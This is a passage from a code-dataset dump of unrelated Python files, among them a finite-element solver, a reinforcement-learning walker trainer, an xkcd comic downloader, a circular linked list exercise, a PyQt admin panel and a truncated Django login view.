dCapacityCache = e.integrator.createCache( lambda xi: e.capacityDerivative( temperature(e.toGlobalCoordinates(xi)) ),\r\n e.basisFunctions.domain )\r\n for i in range(len(e.basisFunctions)):\r\n cache0 = dCapacityCache * e._basisCache[i]\r\n for l in range(len(e.basisFunctions)):\r\n cache1 = cache0 * e._basisCache[l]\r\n for j in range(len(e.basisFunctions)):\r\n integral = e._jacobian * e.integrator.integrateCached(\r\n lambda xi: 1.0,\r\n cache1 * e._basisCache[j],\r\n e.basisFunctions.domain\r\n )\r\n temp[e.DoFs[i], e.DoFs[l]] += integral * (loadFactor*Mq[e.DoFs[j]] - MKu[e.DoFs[j]])\r\n \r\n # Compute derivative\r\n return theta * massInverse.dot( \\\r\n model.stiffness.todense() \\\r\n + model.geometricStiffness.todense() \\\r\n + temp ) \\\r\n + np.eye(model.size)/dt\r\n\r\n\r\n\r\ndef transientLoadControl( model,\r\n initialSolution,\r\n initialStiffness,\r\n initialMass,\r\n initialLoad,\r\n dt,\r\n baseIncrement=0.5,\r\n minIncrement=0.05,\r\n maxIncrement=1.0,\r\n maxIncrements=50,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n theta=0.5,\r\n verbose=True,\r\n axes=None,\r\n convergencePlot=None ):\r\n '''\r\n Solves a nonlinear transient FEModel using a load controlled predictor and a constant load corrector\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution.copy()\r\n loadFactors = []\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n\r\n DT = 1.0/dt * sparse.eye(model.size)\r\n previousState = (1.0-theta) * sparse.linalg.inv(initialMass).dot( initialLoad - initialStiffness.dot(u) ) \\\r\n + DT.dot(u)\r\n\r\n # Define inputs for the Newton iteration\r\n def updateSystem(solution, loadFactor):\r\n reintegrate( model,\r\n loadFactor,\r\n solution)\r\n\r\n mInv = np.zeros( model.mass.shape, dtype=model.mass.dtype )\r\n sparse.linalg.inv(model.mass).todense( out=mInv )\r\n\r\n residual = transientResidual( model,\r\n solution,\r\n loadFactor,\r\n mInv,\r\n theta,\r\n dt,\r\n -1.0*previousState)\r\n tangentStiffness = transientResidualDerivative( model,\r\n solution,\r\n loadFactor,\r\n mInv,\r\n theta,\r\n dt)\r\n return residual, tangentStiffness\r\n\r\n # Initialize structural matrices\r\n reintegrate( model,\r\n 0.0,\r\n initialSolution)\r\n \r\n # 
---------------------------------------------------------\r\n # Increment loop\r\n increment = maxIncrement\r\n lastControl = 0.0\r\n control = lastControl + increment\r\n incrementIndex = -1\r\n\r\n while control < 1.0 or incrementIndex < 0:\r\n\r\n # Update control\r\n incrementIndex += 1\r\n control = lastControl + increment\r\n\r\n if control > 1.0:\r\n control = 1.0\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"Increment# \" + str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Predict\r\n controlIncrement = control-lastControl\r\n tangentStiffness = updateSystem( u, control )[1]\r\n uMid = u + 0.5 * solveLinearSystem( tangentStiffness, controlIncrement * model.load, sparse=False )\r\n\r\n tangentStiffness = updateSystem( uMid, control )[1]\r\n uNew = u + solveLinearSystem( tangentStiffness, controlIncrement * model.load, sparse=False )\r\n\r\n # Correct\r\n try:\r\n uNew = newtonIteration( lambda solution: updateSystem(solution, control),\r\n uNew,\r\n tolerance=tolerance,\r\n maxIterations=maxCorrections,\r\n solverKWArgs={\"sparse\" : False},\r\n verbose=verbose,\r\n convergencePlot=convergencePlot)\r\n except StopIteration:\r\n increment /= 2.0\r\n if increment < minIncrement:\r\n raise RuntimeError( \"Nonlinear iteration failed to converge\" )\r\n continue\r\n\r\n # Update\r\n lastControl = control\r\n u = uNew.copy()\r\n loadFactors.append(control)\r\n \r\n if 2.0*increment < maxIncrement:\r\n increment *= 2.0\r\n\r\n # Plot if requested\r\n if axes is not None:\r\n axes.plot( np.linspace( 0, 1, num=100 ), model.sample( u, np.linspace( 0, 1, num=100 ) ) )\r\n\r\n # ---------------------------------------------------------\r\n # Decorate plot if requested\r\n if axes is not None:\r\n axes.legend( [ \"Control parameter = %.2f\" % l for l in loadFactors ] )\r\n axes.set_xlabel( \"x [m]\" )\r\n axes.set_ylabel( \"T [C]\" )\r\n axes.set_title( \"Temperature Field\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u\r\n\r\n\r\n\r\n\r\ndef transientFixedPointIteration( model,\r\n initialSolution,\r\n initialStiffness,\r\n initialMass,\r\n initialLoad,\r\n dt,\r\n loadFactors=None,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n theta=0.5,\r\n verbose=True,\r\n convergencePlot=None ):\r\n '''\r\n Solves a transient nonlinear FEModel using fixed point iterations\r\n ( Arguments are copied internally )\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution.copy()\r\n DT = 1.0/dt * sparse.eye(model.size)\r\n resNorm = None\r\n\r\n if loadFactors is None:\r\n loadFactors = [1.0]\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n\r\n # Initialize system components\r\n initialState = (1.0-theta) * sparse.linalg.inv(initialMass).dot( initialLoad - initialStiffness.dot(u) ) \\\r\n + DT.dot(u)\r\n \r\n # ---------------------------------------------------------\r\n # Increment loop\r\n for incrementIndex, control in enumerate(loadFactors):\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"\\nIncrement# \" + str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Correction loop\r\n for correctionIndex in range(maxCorrections):\r\n # Update residual\r\n reintegrate( model, \r\n control, \r\n u,\r\n geometricStiffness=False )\r\n\r\n massInverse = sparse.linalg.inv(model.mass)\r\n currentState = theta * massInverse.dot(model.stiffness) + DT\r\n currentLoad = theta * massInverse.dot(control 
* model.load) + initialState\r\n \r\n residual = currentState.dot(u) - currentLoad\r\n resNorm = np.linalg.norm(residual)\r\n \r\n # Check termination criterion and update output streams\r\n if verbose:\r\n print( \"Current residual\\t: %.3E\" % resNorm )\r\n if convergencePlot is not None:\r\n convergencePlot( resNorm )\r\n if resNorm < tolerance:\r\n break\r\n\r\n # Correct\r\n u = solveLinearSystem( currentState,\r\n currentLoad )\r\n\r\n # Compute final residual\r\n if resNorm > tolerance:\r\n reintegrate( model, \r\n loadFactors[-1], \r\n u,\r\n geometricStiffness=False )\r\n massInverse = sparse.linalg.inv(model.mass)\r\n currentState = theta * massInverse.dot(model.stiffness) + DT\r\n currentLoad = theta * massInverse.dot(loadFactors[-1] * model.load) + initialState\r\n residual = currentState.dot(u) - currentLoad\r\n resNorm = np.linalg.norm(residual)\r\n\r\n if verbose:\r\n print( \"Final residual\\t\\t: %.3E\" % resNorm )\r\n\r\n if resNorm > tolerance:\r\n print( \"Nonlinear solver failed to correct increment\" )\r\n\r\n # ---------------------------------------------------------\r\n #uDot = (u-initialSolution)/dt\r\n #eq = model.mass.dot(uDot) + model.stiffness.dot(u) - model.load\r\n #print( \"Eq residual\\t\\t: %.3E\" % np.linalg.norm(eq) )\r\n\r\n if resNorm > tolerance:\r\n raise RuntimeError( \"Nonlinear solver failed to converge\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u","sub_path":"libraries/fem/python/modules/fem/numeric/nonlinearsolver.py","file_name":"nonlinearsolver.py","file_ext":"py","file_size_in_byte":21951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"591650601","text":"# Credit to Colin Skow\n# Adapted code from https://github.com/colinskow/move37/blob/master/ars/ars.py\n\nimport gym\nfrom gym import wrappers\nimport numpy as np\nimport os\n\n\nclass Normalizer():\n \"\"\"Normalize input values.\n Args:\n n_inputs: Number of input values\n \"\"\"\n\n def __init__(self, n_inputs):\n self.n = np.zeros(n_inputs)\n self.mean = np.zeros(n_inputs)\n self.mean_diff = np.zeros(n_inputs)\n self.var = np.zeros(n_inputs)\n\n def observe(self, x):\n \"\"\"\n Update mean and variance values based on observation values.\n\n Args:\n x(Numpy array): Observed value\n \"\"\"\n self.n += 1.0\n last_mean = self.mean.copy()\n self.mean += (x - self.mean) / self.n\n self.mean_diff += (x - last_mean) * (x - self.mean)\n self.var = (self.mean_diff / self.n).clip(min = 1e-2)\n\n def normalize(self, inputs):\n \"\"\"\n Normalize input values.\n\n Args:\n inputs(list of floats): Input values to normalize.\n\n Returns:\n Normalized input values with same shape and `inputs`.\n \"\"\"\n obs_mean = self.mean\n obs_std = np.sqrt(self.var)\n return (inputs - obs_mean) / obs_std\n \n\nclass Policy():\n \"\"\"Policy Agent should follow\n \n Args: \n input_size(int): Number of weights in input layer.\n output_size(int): Number of weights in output layer.\n \"\"\"\n\n def __init__(self, input_size, output_size):\n self.theta = np.zeros((output_size, input_size))\n\n def evaluate(self, input, noise, delta=None, direction=None):\n \"\"\"\n Add noise to weights based on gradient decent direction \n and return new theta values dot product (with input).\n\n Args:\n input(list of floats): Normalized observed input values.\n delta(list of floats): Relative step size (multiplied with noise) during gradient descent\n noise(float): Amount of delta distortion to add to weights.\n \n Returns:\n 
N-dimensional array of dot product of input and \n new theta values.\n \"\"\"\n\n if direction is None:\n return self.theta.dot(input)\n elif direction == \"+\":\n return (self.theta + noise * delta).dot(input)\n elif direction == \"-\":\n return (self.theta - noise * delta).dot(input)\n \n def sample_deltas(self, n_deltas):\n \"\"\"Sample random delta values from normal distribution for each input weight.\n\n Args:\n n_deltas(int): Number of deltas to sample for each input weight.\n \n Returns:\n List of lists of floats.\n \"\"\"\n\n return [np.random.randn(*self.theta.shape) for _ in range(n_deltas)]\n\n def update(self, rollouts, lr, sigma_rewards):\n \"\"\"\n Update theta values / weights based on learning rate and step size.\n\n Args:\n lr(float): Learning Rate\n rollouts(list of tuples): Positive rewards, Negative rewards, Delta values.\n sigma_rewards(float): Standard deviation of rewards\n \"\"\"\n \n # step for every theta (direction)\n step = np.zeros(self.theta.shape)\n n_best_deltas = len(rollouts)\n for r_pos, r_neg, delta in rollouts:\n step += (r_pos - r_neg) * delta\n self.theta += lr / (n_best_deltas * sigma_rewards) * step\n\nclass Model():\n \"\"\"Training Model for agent.\"\"\"\n def __init__(self):\n pass\n\n def make_env(self, env, video_freq, monitor_dir):\n \"\"\"Set Gym Environment\n \n Args:\n env(str): OpenAI Gym environment name.\n video_freq(int): How often (step frequency) to record video.\n monitor_dir(str): Directory to write log and video files to.\n \"\"\"\n\n self.env = gym.make(env)\n self.video_freq = video_freq\n should_record = lambda i: self.record_video\n self.record_video = False\n\n self.env = wrappers.Monitor(self.env, monitor_dir, \n video_callable=should_record, force=True)\n\n def set_normalizer(self, normalizer):\n \"\"\"Set Normalizer class to use for input normalizing.\"\"\"\n self.normalizer = normalizer\n\n # Explore the policy on one specific direction and over one episode\n def explore(self, noise, direction=None, delta=None):\n \"\"\"\n Run episode as exploration.\n\n Args:\n noise(float): Amount of delta distortion to add to weights.\n direction(str in ('-', '+') or None): Direction of next exploration.\n delta(list of floats): Relative step size (multiplied with noise) during gradient descent.\n\n Returns:\n Sum of rewards collected during episode.\n \"\"\"\n state = self.env.reset()\n done = False\n num_plays = 0\n sum_rewards = 0.0\n while not done and num_plays < self.episode_length:\n self.normalizer.observe(state)\n state = self.normalizer.normalize(state)\n action = self.policy.evaluate(state, noise, delta, direction)\n state, reward, done, _ = self.env.step(action)\n reward = max(min(reward, 1), -1)\n sum_rewards += reward\n num_plays += 1\n return sum_rewards\n\n def train(self, n_steps, n_deltas, n_best_deltas, noise, episode_length, lr):\n \"\"\"\n Train agent.\n\n Args:\n n_steps(int): Number of episodes.\n n_deltas(int): Number of deltas to use per episode.\n n_best_deltas(int): Number of best deltas to use for policy update.\n noise(float): Amount of delta distortion to add to weights.\n episode_length(int): Maximum number of actions to perform during an episode.\n lr(float): Learning rate of model.\n \"\"\"\n self.episode_length = episode_length\n self.noise = noise\n for step in range(n_steps):\n # initialize the random noise deltas and the positive/negative rewards\n deltas = self.policy.sample_deltas(n_deltas=n_deltas)\n positive_rewards = [0] * n_deltas\n negative_rewards = [0] * n_deltas\n\n # play an episode each 
with positive deltas and negative deltas, collect rewards\n for k in range(n_deltas):\n positive_rewards[k] = self.explore(noise, direction=\"+\", delta=deltas[k])\n negative_rewards[k] = self.explore(noise, direction=\"-\", delta=deltas[k])\n \n # Compute the standard deviation of all rewards\n sigma_rewards = np.array(positive_rewards + negative_rewards).std()\n\n # Sort the rollouts by the max(r_pos, r_neg) and select the deltas with best rewards\n scores = {k:max(r_pos, r_neg) for k,(r_pos,r_neg) in enumerate(zip(positive_rewards, negative_rewards))}\n order = sorted(scores.keys(), key = lambda x:scores[x], reverse = True)[:n_best_deltas]\n rollouts = [(positive_rewards[k], negative_rewards[k], deltas[k]) for k in order]\n\n # Update the policy\n self.policy.update(rollouts, lr, sigma_rewards)\n\n # Only record video during evaluation, every n steps\n if step % self.video_freq == 0:\n self.record_video = True\n # Play an episode with the new weights and print the score\n reward_evaluation = self.explore(noise)\n print('Step: ', step, 'Reward: ', reward_evaluation)\n self.record_video = False\n\nif __name__ == '__main__':\n # openAI gym environment\n ENV_NAME = 'BipedalWalker-v2'\n \n # video directories\n video_dir = '../additional/videos'\n monitor_dir = os.path.join(video_dir, ENV_NAME)\n\n # create video directories\n if not os.path.exists(video_dir):\n os.makedirs(video_dir)\n if not os.path.exists(monitor_dir):\n os.makedirs(monitor_dir)\n\n # hyperparameters for training\n hyperparams = {\n 'n_steps': 1000, \n 'episode_length': 2000, \n 'lr': 0.01, \n 'n_deltas': 16, \n 'n_best_deltas': 16, \n 'noise': 0.03, \n 'video_freq': 50\n }\n\n # init model\n model = Model()\n\n # set environment and record params\n model.make_env(ENV_NAME, \n video_freq=hyperparams['video_freq'], \n monitor_dir=monitor_dir)\n \n # define input and output layer sizes\n input_size = model.env.observation_space.shape[0]\n output_size=model.env.action_space.shape[0]\n\n # initialize policy to use for training\n model.policy = Policy(input_size=input_size, output_size=output_size)\n\n # specify normalizing method to use\n model.set_normalizer(Normalizer(n_inputs=input_size))\n\n # train model\n model.train(n_steps=hyperparams['n_steps'], \n n_deltas=hyperparams['n_deltas'], \n n_best_deltas=hyperparams['n_best_deltas'], \n noise=hyperparams['noise'], \n episode_length=hyperparams['episode_length'], \n lr=hyperparams['lr'])\n\n ","sub_path":"src/bipedal.py","file_name":"bipedal.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107283005","text":"import os\nimport sys\nimport argparse\nfrom egcg_core.app_logging import logging_default as log_cfg\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom config import load_config\nfrom upload_to_gel.deliver_data_to_gel import GelDataDelivery, check_all_deliveries, report_all\n\n\ndef main():\n p = argparse.ArgumentParser()\n p.add_argument('--dry_run', action='store_true')\n p.add_argument('--debug', action='store_true')\n p.add_argument('--work_dir', type=str)\n group = p.add_mutually_exclusive_group()\n group.add_argument('--sample_id', type=str)\n group.add_argument('--user_sample_id', type=str)\n p.add_argument('--force_new_delivery', action='store_true')\n p.add_argument('--no_cleanup', action='store_true')\n p.add_argument('--check_all_deliveries', action='store_true')\n p.add_argument('--report', action='store_true')\n\n args = 
p.parse_args()\n    load_config()\n    log_cfg.add_stdout_handler()\n\n    if args.debug:\n        log_cfg.set_log_level(10)\n\n    if args.check_all_deliveries:\n        check_all_deliveries()\n    elif args.report:\n        report_all()\n    else:\n        gel_delivery = GelDataDelivery(args.sample_id, user_sample_id=args.user_sample_id, work_dir=args.work_dir,\n                                       dry_run=args.dry_run, no_cleanup=args.no_cleanup,\n                                       force_new_delivery=args.force_new_delivery)\n        gel_delivery.deliver_data()\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","sub_path":"bin/deliver_data_to_gel.py","file_name":"deliver_data_to_gel.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"422222193","text":"import requests,bs4,os\n\n# Start at the newest comic; the crawl ends once the 'prev' link is '#'.\n# (The original start URL ended in '#', so the loop below never ran.)\nurl = 'http://xkcd.com'\nos.makedirs('xkcd',exist_ok=True)\nwhile not url.endswith('#'):\n    print('Downloading page %s...'%url)\n    res = requests.get(url)\n    res.raise_for_status()\n    soup = bs4.BeautifulSoup(res.text, 'html.parser')\n    comicElem = soup.select('#comic img')\n    if comicElem == []:\n        print('Could not find comic image.')\n    else:\n        comicURL = 'http:'+comicElem[0].get('src')\n        print('Downloading image %s...'%(comicURL))\n        res = requests.get(comicURL)\n        res.raise_for_status()\n        imageFile = open(os.path.join('xkcd',os.path.basename(comicURL)),'wb')\n        for chunk in res.iter_content(100000):\n            imageFile.write(chunk)\n        imageFile.close()\n    preLink = soup.select('a[rel=\"prev\"]')[0]\n    url = 'http://www.xkcd.com'+preLink.get('href')\n\nprint('Done.')\n\n","sub_path":"getcomdic.py","file_name":"getcomdic.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"638711470","text":"import cv2\nimport sys\n\nif len(sys.argv) != 2:\n    sys.exit(\"usage: python2 SIFT.py \");\n\nimg = cv2.imread(str(sys.argv[1]))\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nsift = cv2.xfeatures2d.SIFT_create()\nkp = sift.detect(gray, None)\n\nimg2 = cv2.drawKeypoints(gray, kp, None, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\ncv2.imshow('sift_keypoints.png', img2)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"SIFT.py","file_name":"SIFT.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"12995166","text":"import chainer\nimport chainer.functions as F\nimport argparse\n\nfrom pathlib import Path\nfrom chainer import serializers\nfrom model import Model, VGG\nfrom dataset import DatasetLoader\nfrom utils import set_optimizer\nfrom visualize import Visualizer\n\n\nclass RAMLossFunction:\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def content_loss(y, t):\n        return F.mean_absolute_error(y, t)\n\n    @staticmethod\n    def perceptual_loss(y, t):\n        sum_loss = 0\n\n        for f1, f2 in zip(y, t):\n            _, c, h, w = f1.shape\n            sum_loss += F.mean_squared_error(f1, f2) / (c * h * w)\n\n        return sum_loss\n\n    def __str__(self):\n        return f\"func1: {self.content_loss.__name__}\\nfunc2: {self.perceptual_loss.__name__}\"\n\n\ndef train(epochs,\n          iterations,\n          batchsize,\n          validsize,\n          outdir,\n          modeldir,\n          extension,\n          crop_size,\n          learning_rate,\n          beta1,\n          beta2,\n          data_path\n          ):\n\n    # Dataset Definition\n    dataloader = DatasetLoader(data_path)\n    print(dataloader)\n    t_valid, x_valid = dataloader(validsize, mode=\"valid\")\n\n    # Model & Optimizer Definition\n    model = Model()\n    model.to_gpu()\n    optimizer = set_optimizer(model, learning_rate, beta1, 
beta2)\n\n vgg = VGG()\n vgg.to_gpu()\n vgg_opt = set_optimizer(vgg, learning_rate, beta1, beta2)\n vgg.base.disable_update()\n\n # Loss Function Definition\n lossfunc = RAMLossFunction()\n print(lossfunc)\n\n # Evaluation Definition\n visualizer = Visualizer()\n\n for epoch in range(epochs):\n sum_loss = 0\n for batch in range(0, iterations, batchsize):\n t_train, x_train = dataloader(batchsize, mode=\"train\")\n\n y_train = model(x_train)\n y_feat = vgg(y_train)\n t_feat = vgg(t_train)\n loss = lossfunc.content_loss(y_train, t_train)\n loss += lossfunc.perceptual_loss(y_feat, t_feat)\n\n model.cleargrads()\n vgg.cleargrads()\n loss.backward()\n optimizer.update()\n vgg_opt.update()\n loss.unchain_backward()\n\n sum_loss += loss.data\n\n if batch == 0:\n serializers.save_npz(f\"{modeldir}/model_{epoch}.model\", model)\n\n with chainer.using_config('train', False):\n y_valid = model(x_valid)\n x = x_valid.data.get()\n y = y_valid.data.get()\n t = t_valid.data.get()\n\n visualizer(x, y, t, epoch, outdir)\n\n print(f\"epoch: {epoch}\")\n print(f\"loss: {sum_loss / iterations}\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"RAM\")\n parser.add_argument('--e', type=int, default=1000, help=\"the number of epochs\")\n parser.add_argument('--i', type=int, default=10000, help=\"the number of iterations\")\n parser.add_argument('--b', type=int, default=16, help=\"batch size\")\n parser.add_argument('--v', type=int, default=12, help=\"valid size\")\n parser.add_argument('--outdir', type=Path, default=\"outdir\", help=\"output directory\")\n parser.add_argument('--modeldir', type=Path, default=\"modeldir\", help=\"model output directory\")\n parser.add_argument('--ext', type=str, default=\".jpg\", help=\"output directory\")\n parser.add_argument('--size', type=int, default=256, help=\"crop size of training images\")\n parser.add_argument('--lr', type=float, default=0.0001, help=\"learning rate of Adam\")\n parser.add_argument('--b1', type=float, default=0.5, help=\"beta1 of Adam\")\n parser.add_argument('--b2', type=float, default=0.999, help=\"beta2 of Adam\")\n parser.add_argument('--path', type=Path, help=\"path which contais training images\")\n args = parser.parse_args()\n\n outdir = args.outdir\n outdir.mkdir(exist_ok=True)\n\n modeldir = args.modeldir\n modeldir.mkdir(exist_ok=True)\n\n train(args.e, args.i, args.b, args.v, args.outdir, args.modeldir, args.ext, args.size,\n args.lr, args.b1, args.b2, args.path)","sub_path":"RAM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"60930734","text":"def length_string(number):\n result = 0\n if number == 0 or number == 1:\n return 0\n else:\n for i in range(1, number):\n index = len(str(i))\n result += index\n return result\n\nprint(length_string(2020))\n\n\n\n\ndef ndigit(n):\n result = 0\n for i in range(1, n):\n count = 0\n while i!=0:\n i//=10\n count+=1\n result+=count\n return result\nprint(ndigit(2020))\n\n\n","sub_path":"howmanydigit.py","file_name":"howmanydigit.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461955412","text":"class Node:\n\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass CircularLinkedList:\n\n def __init__(self):\n self.head = None\n\n def prepend(self, data):\n\n new_node = Node(data)\n new_node.next = self.head\n\n p = 
self.head\n\n if p.next == self.head:\n p.next = new_node\n\n else:\n while p.next != self.head:\n p = p.next\n p.next = new_node\n self.head = new_node\n\n def append(self, data):\n new_node = Node(data)\n\n if self.head is None:\n self.head = new_node\n new_node.next = self.head\n else:\n p = self.head\n while p.next != self.head:\n p = p.next\n p.next = new_node\n new_node.next = self.head\n\n def print_list(self):\n\n if self.head is None:\n print(\"List is empty\")\n\n elif self.head.next == self.head: # ! If list has only one value\n print(self.head.data)\n\n else: # ! If list has more than one values\n p = self.head\n while p.next != self.head:\n print(p.data)\n p = p.next\n print(p.data)\n\n def remove(self, key):\n # p = self.head\n # prev = None\n\n # if self.head is None:\n # return\n\n # # ! delete only node from the circular linked list if it matches the key.\n # elif p.next == self.head:\n # if p.data == key:\n # self.head = None\n # else:\n # print(f\"{key} is not found\")\n \n # #! delete first node from the non-empty list.\n # # if self.head.data == key:\n # # self.head = self.head.next\n \n # # while p.next != self.head:\n # # p = p.next\n # # p.next = p.next.next\n\n # while p.next != self.head: # ! delete any node from the non empty circular linked list\n # prev = p\n # p = p.next\n # if p.data == key:\n # break\n\n # if p.data == key: # ! If loop terminates because of key found in the circular linked list.\n # prev.next = p.next\n # else:\n # print(f\"{key} is not found\")\n\n # #! delete last node from the non-empty circular linked list\n # while p.next != self.head:\n # p = p.next\n # prev = p\n # if p.data == key:\n # prev.next = p.next\n # else:\n # print(\"Key is not found in the list.\")\n \n\n \"\"\"\n We have to take care for two cases \n 1. when the key is head node\n 2. when the key is not head node\n \"\"\"\n if self.head.data == key:\n p = self.head\n while p.next != self.head:\n p = p.next\n p.next = self.head.next\n self.head = self.head.next\n\n else:\n p = self.head\n prev = None\n while p.next != self.head:\n prev = p\n p = p.next\n if p.data == key:\n prev.next = p.next\n p = p.next \n \n def __len__(self):\n \"\"\"We are overriding the inbuilt len function so that it gives us the length of our circular linked list\"\"\"\n p = self.head\n count = 0\n while p:\n count += 1\n p = p.next\n if p == self.head:\n break\n return count\n \n def split_list(self):\n \"\"\"We need the len function. 
Because we will split our list from the mid so we need the mid point of the list.\"\"\"\n\n if len(self) == 0:\n return None\n \n if len(self) == 1:\n return self.head\n \n p = self.head\n prev = None\n\n count = 0\n mid_point = len(self)//2\n\n while p is not None and count < mid_point:\n count += 1\n prev = p\n p = p.next\n prev.next = self.head\n\n split_cllist = CircularLinkedList()\n while p.next != self.head:\n split_cllist.append(p.data)\n p = p.next\n split_cllist.append(p.data)\n\n self.print_list()\n print(\"\\n\")\n split_cllist.print_list()\n \n def concatenate_list(self, list2):\n p = self.head\n q = list2.head\n\n if p is None:\n p = q\n return\n \n if q is None:\n return\n \n while p.next != self.head:\n p = p.next\n p.next = q\n\n while q.next != list2.head:\n q = q.next\n q.next = self.head\n \n return self.print_list()\n\n\ncllist = CircularLinkedList()\ncllist2 = CircularLinkedList()\ncllist.append(6)\ncllist.append(7)\ncllist.append(8)\ncllist.append(9)\ncllist.append(10)\ncllist.prepend(5)\ncllist.prepend(4)\ncllist.prepend(3)\ncllist.prepend(2)\ncllist.prepend(1)\ncllist2.append(11)\ncllist2.append(12)\ncllist2.append(13)\ncllist2.append(14)\ncllist2.append(15)\n# cllist.remove(1)\n# cllist.remove(10)\n# cllist.split_list()\n# cllist.print_list()\ncllist.concatenate_list(cllist2)\n\n","sub_path":"LinkedList/Practice/CircularLinkedList.py","file_name":"CircularLinkedList.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"386640694","text":"from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QGridLayout, QFrame\nfrom PyQt5.QtWidgets import QHBoxLayout\n\n# 超级管理员功能界面\nfrom SuperAdminisOperation import Function\n\n\nclass Function_win(QFrame):\n def __init__(self):\n super(Function_win, self).__init__()\n self.setFrameShape(QFrame.StyledPanel)\n self.setFrameShadow(QFrame.Raised)\n self.datawindow = Function.Function(self)\n self.mainbutton1 = QPushButton(\"管理信息\") # 用户功能界面的控件\n self.mainbutton2 = QPushButton(\"爬虫\")\n self.mainbutton3 = QPushButton(\"添加资料\")\n self.devise_Ui()\n\n def devise_Ui(self):\n self.horizontalLayout = QHBoxLayout(self)\n self.layout = QGridLayout()\n self.win = QWidget()\n self.win.setLayout(self.layout) # 设置顶级布局管理器\n self.horizontalLayout.addWidget(self.win)\n self.win.setMouseTracking(True) # 设置widget鼠标跟踪\n\n self.desktop = QApplication.desktop() # 获取屏幕分辨率\n self.screenRect = self.desktop.screenGeometry()\n b = self.screenRect.height() * 1.0 / 4\n a = self.screenRect.width() * 1.0 / 5\n\n self.mainbutton1.setStyleSheet(\"QPushButton{ font-family:'宋体';font-size:32px;color:rgb(0,0,0);}\\\n QPushButton{background-color:rgb(170,200, 50)}\\\n QPushButton:hover{background-color:rgb(50, 170, 200)}\")\n self.mainbutton2.setStyleSheet(\"QPushButton{ font-family:'宋体';font-size:32px;color:rgb(0,0,0);}\\\n QPushButton{background-color:rgb(170,200, 50)}\\\n QPushButton:hover{background-color:rgb(50, 170, 200)}\")\n self.mainbutton3.setStyleSheet(\"QPushButton{ font-family:'宋体';font-size:32px;color:rgb(0,0,0);}\\\n QPushButton{background-color:rgb(170,200, 50)}\\\n QPushButton:hover{background-color:rgb(50, 170, 200)}\")\n self.layout.addWidget(self.mainbutton1, 0, 0) # 往网格的不同坐标添加不同的组件\n self.layout.addWidget(self.mainbutton2, 0, 1)\n self.layout.addWidget(self.mainbutton3, 0, 2)\n self.mainbutton1.setMaximumSize(a, b)\n self.mainbutton2.setMaximumSize(a, b)\n self.mainbutton3.setMaximumSize(a, 
b)","sub_path":"low7/SuperAdminisInterface/Function_win.py","file_name":"Function_win.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601528813","text":"import re\nfrom urllib.parse import parse_qs, urlparse\n\nfrom django.conf import settings\nfrom django.contrib.auth import logout as auth_logout\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.http import quote\nfrom django.views.generic.base import TemplateView\nfrom oauth2_provider.models import get_application_model\nfrom oidc_provider.models import Client\nfrom oidc_provider.views import AuthorizeView\n\nfrom oidc_apis.models import ApiScope\n\nfrom .models import LoginMethod, OidcClientOptions\n\n\nclass LoginView(TemplateView):\n template_name = \"login.html\"\n\n def get(self, request, *args, **kwargs): # noqa (too complex)\n next_url = request.GET.get('next')\n app = None\n oidc_client = None\n\n if next_url:\n # Determine application from the 'next' query argument.\n # FIXME: There should be a better way to get the app id.\n params = parse_qs(urlparse(next_url).query)\n client_id = params.get('client_id')\n\n if client_id and len(client_id):\n client_id = client_id[0].strip()\n\n if client_id:\n try:\n app = get_application_model().objects.get(client_id=client_id)\n except get_application_model().DoesNotExist:\n pass\n\n try:\n oidc_client = Client.objects.get(client_id=client_id)\n except Client.DoesNotExist:\n pass\n\n next_url = quote(next_url)\n\n allowed_methods = None\n if app:\n allowed_methods = app.login_methods.all()\n elif oidc_client:\n try:\n client_options = OidcClientOptions.objects.get(oidc_client=oidc_client)\n allowed_methods = client_options.login_methods.all()\n except OidcClientOptions.DoesNotExist:\n pass\n\n if allowed_methods is 